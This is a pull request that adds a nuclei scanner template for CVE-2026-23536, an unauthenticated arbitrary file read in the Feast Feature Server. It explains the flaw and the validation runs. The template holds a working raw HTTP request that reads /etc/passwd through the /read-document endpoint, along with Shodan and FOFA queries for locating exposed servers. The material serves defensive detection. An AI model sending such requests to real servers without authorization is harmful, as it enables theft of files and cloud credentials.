### PR TITLE
Add CVE-2026-23536 (Feast Feature Server <=0.58.0 - Unauthenticated Arbitrary File Read)

### DIFF
--- a/http/cves/2026/CVE-2026-23536.yaml
+++ b/http/cves/2026/CVE-2026-23536.yaml
@@ -1,0 +1,60 @@
+id: CVE-2026-23536
+
+info:
+  name: Feast Feature Server <=0.58.0 - Unauthenticated Arbitrary File Read
+  author: str4k3r
+  severity: high
+  description: |
+    Feast (the open-source Feature Store) Feature Server through 0.58.0 exposes
+    an unauthenticated POST /read-document endpoint that reads an arbitrary,
+    caller-supplied file path with no authentication and no path validation.
+    The read_document_endpoint handler passes the JSON `file_path` field
+    straight to os.path.exists()/open() and returns the file contents in the
+    JSON `content` field, so a remote, unauthenticated attacker can read any
+    file readable by the server process (e.g. /etc/passwd, feature_store.yaml,
+    cloud credentials). Unlike the store-mutating routes it carries no
+    inject_user_details/permission dependency. Fixed by removing the endpoint
+    in later releases.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-23536
+    - https://access.redhat.com/security/cve/CVE-2026-23536
+    - https://bugzilla.redhat.com/show_bug.cgi?id=2429302
+    - https://github.com/feast-dev/feast
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-23536
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 1
+    product: feast
+    vendor: feast-dev
+  tags: cve,cve2026,feast,lfi,fileread,unauth,mlops
+
+http:
+  - raw:
+      - |
+        POST /read-document HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"file_path":"/etc/passwd"}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"content":'
+          - '"file_path":'
+        condition: and
+
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-23536.yaml
+++ b/http/cves/2026/CVE-2026-23536.yaml
@@ -1,25 +1,16 @@
 id: CVE-2026-23536
 
 info:
-  name: Feast Feature Server <=0.58.0 - Unauthenticated Arbitrary File Read
+  name: Feast Feature Server <=0.58.0 - Arbitrary File Read
   author: str4k3r
   severity: high
   description: |
-    Feast (the open-source Feature Store) Feature Server through 0.58.0 exposes
-    an unauthenticated POST /read-document endpoint that reads an arbitrary,
-    caller-supplied file path with no authentication and no path validation.
-    The read_document_endpoint handler passes the JSON `file_path` field
-    straight to os.path.exists()/open() and returns the file contents in the
-    JSON `content` field, so a remote, unauthenticated attacker can read any
-    file readable by the server process (e.g. /etc/passwd, feature_store.yaml,
-    cloud credentials). Unlike the store-mutating routes it carries no
-    inject_user_details/permission dependency. Fixed by removing the endpoint
-    in later releases.
+    Feast (the open-source Feature Store) Feature Server through 0.58.0 exposes an unauthenticated POST /read-document endpoint that reads an arbitrary, caller-supplied file path with no authentication and no path validation. The read_document_endpoint handler passes the JSON `file_path` field straight to os.path.exists()/open() and returns the file contents in the JSON `content` field, so a remote, unauthenticated attacker can read any file readable by the server process (e.g. /etc/passwd, feature_store.yaml, cloud credentials). Unlike the store-mutating routes it carries no inject_user_details/permission dependency.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-23536
     - https://access.redhat.com/security/cve/CVE-2026-23536
     - https://bugzilla.redhat.com/show_bug.cgi?id=2429302
     - https://github.com/feast-dev/feast
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-23536
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -30,7 +21,9 @@ info:
     max-request: 1
     product: feast
     vendor: feast-dev
-  tags: cve,cve2026,feast,lfi,fileread,unauth,mlops
+    shodan-query: http.favicon.hash:493797515
+    fofa-query: icon_hash="493797515"
+  tags: cve,cve2026,feast,lfi,traversal,mlops
 
 http:
   - raw:


### PR DESCRIPTION
## CVE-2026-23536 — Feast Feature Server Unauthenticated Arbitrary File Read

Adds a template for **CVE-2026-23536** (CVSS 7.5, HIGH), an unauthenticated arbitrary file read in the Feast (feast-dev) Feature Server through **0.58.0**.

### Details
The `POST /read-document` endpoint (`read_document_endpoint` in `feature_server.py`) passes the caller-supplied JSON `file_path` straight to `os.path.exists()`/`open()` with no authentication and no path validation, returning the file contents in the `content` field. Unlike the store-mutating routes it carries no `inject_user_details`/permission dependency, so any remote unauthenticated attacker can read files readable by the server process (`/etc/passwd`, `feature_store.yaml`, cloud credentials). The endpoint was removed in later releases.

### Validation
Verified with native nuclei against default `feast serve` deployments:
- **Vulnerable** feast 0.58.0 → `200` with `{"content":"root:x:0:0:..."}` — **DETECTED** (3/3)
- **Fixed** feast 0.65.0 (endpoint removed) → `404` — **NOT DETECTED** (3/3)

### References
- https://nvd.nist.gov/vuln/detail/CVE-2026-23536
- https://access.redhat.com/security/cve/CVE-2026-23536
- https://bugzilla.redhat.com/show_bug.cgi?id=2429302